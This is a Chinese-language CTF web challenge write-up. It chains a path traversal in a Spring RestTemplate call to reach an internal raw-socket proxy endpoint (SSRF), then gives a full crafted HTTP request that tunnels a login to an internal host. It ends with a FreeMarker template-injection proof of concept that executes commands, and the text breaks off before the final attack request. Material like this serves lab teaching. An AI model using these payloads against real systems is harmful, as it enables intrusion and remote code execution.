CTF web题 代理相关

背景
有三虚拟机：虚拟机a、虚拟机service-provider、虚拟机c，我们只能访问虚拟机a的8080端口及其提供的web服务，其中包括访问虚拟机service-provider的代理服务；虚拟机service-provider的web服务没有对外端口，提供访问虚拟机c的代理；虚拟机c没有直接对外提供服务。

来看虚拟机a的代理服务：

// 虚拟机a
@PostMapping({"/user"})
    public String getUserInfo(HttpServletRequest request, @RequestParam String name) {
        ResponseEntity responseEntity = this.restTemplate.exchange("http://service-provider/user/" + name, HttpMethod.GET, (HttpEntity)null, String.class, request.getParameterMap());
        return (String)responseEntity.getBody();
    }

service-provider的user接口，也就是可以通过上面的服务转过来，但是转过来后发现这个接口没什么用。

// 虚拟机service-provider
@GetMapping({"/user/{name}"})
    public User getUserInfo(@PathVariable String name) {
        return this.userService.queryUser(name);
    }

service-provider的proxy接口，这才是我们需要的接口，通过该接口我们可以访问到虚拟机c的服务，所以我们可以使用name=…/proxy来访问到proxy接口

// 虚拟机service-provider
@RequestMapping({"/proxy"})
    public byte[] proxy(@RequestParam String target, @RequestParam String data) throws IOException {
        SocketChannel socketChannel = null;
        ByteBuffer byteBuffer = ByteBuffer.allocate(2048);

        try {
            String host = target.split(":")[0];
            int port = Integer.valueOf(target.split(":")[1]);
            socketChannel = SocketChannel.open();
            socketChannel.socket().connect(new InetSocketAddress(host, port), 2);
            socketChannel.write(ByteBuffer.wrap(data.getBytes()));
            socketChannel.read(byteBuffer);
        } catch (Exception var10) {
        } finally {
            if (socketChannel != null) {
                socketChannel.close();
            }
        }
        return byteBuffer.array();
    }

构造访问包如下，其中172.77.225.181为虚拟机c的服务，发送登录包，其中postData通过/proxy的socket发送数据，这里需要注意第二个包中的Content-Length: 43，43需要自己计算，为postData编码前的大小。

POST /user?postData=%7B%22username%22%3A%22admin%22%2C%22password%22%3A%22123456789%22%7D HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33527021602761954441026510006
Content-Length: 753
Origin: http://127.0.0.1:8090
Connection: close
Referer: http://127.0.0.1:8090/admin/index.html
Cookie: JSESSIONID=1302C764D1B0FEDD85D0AA972B92DBBB; CSRFTOKEN=700375548; SECURE=SECURE_1393885932

-----------------------------33527021602761954441026510006
Content-Disposition: form-data; name="name"

../proxy?target=172.77.225.181:8090&data=POST /api/admin/login HTTP/1.1
Host: 172.77.225.181:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 43
Origin: http://127.0.0.1:8090
Connection: close
Referer: http://127.0.0.1:8090/admin/index.html
Cookie: JSESSIONID=194AFB9FB798E4778345C968F7662F0B; CSRFTOKEN=1127913799; SECURE=SECURE_1896933955

{postData}
-----------------------------33527021602761954441026510006--

返回认证信息

虚拟机c的服务上有freeMark的模版注入漏洞，poc如下：

<#assign loader=Request["org.springframework.web.servlet.DispatcherServlet.CONTEXT"]["classLoader"]["loadClass"]>
<#assign clz=loader("freemarker.template.utility.Execute")>
<#assign exec=Request["org.springframework.web.servlet.DispatcherServlet.CONTEXT"]["getBean"]("gson")["fromJson"]("{}", clz)> 
${exec("id")}

使用代理进行攻击：

访问：